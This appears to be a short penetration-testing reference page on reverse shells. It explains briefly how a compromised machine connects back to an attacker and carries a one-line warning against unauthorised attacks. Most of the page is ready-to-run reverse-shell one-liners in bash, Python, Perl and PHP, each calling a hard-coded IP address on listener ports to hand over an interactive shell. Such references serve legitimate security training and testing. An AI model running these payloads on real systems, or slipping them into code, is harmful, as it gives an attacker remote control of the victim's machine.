Reverse shells
Reverse shells¶
Reverse shells: [ How it Works ]
A reverse shell, also known as a remote shell or “connect-back shell,” takes advantage of the target system’s vulnerabilities to initiate a shell session and then access the victim’s computer.
The goal is to connect to a remote computer and redirect the input and output connections of the target system’s shell so the attacker can access it remotely.
Reverse shells allow attackers to open ports to the target machines, forcing communication and enabling a complete takeover of the target machine. Therefore it is a severe security threat. This method is also commonly used in penetration tests.
Attention
You shouldn`t attack any machine that you are not allowed to do that.
Examples¶
some basic examples in bash:
bash -i >& /dev/tcp/172.16.6.141/6666 0>&1
in python:
python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); v_ip="172.16.6.141"; s.connect((v_ip,4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); v_shell_path="/usr/bin/bash";v_shell_value="-i"; p=subprocess.call([v_shell_path,v_shell_value]);'
in perl:
perl -e 'use Socket; $i="172.16.6.141";$p=6666; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/usr/bin/bash -i");};'
php:
php -r '$sock=fsockopen("172.16.6.141",7777);exec("/bin/sh -i <&3 >&3 2>&3");'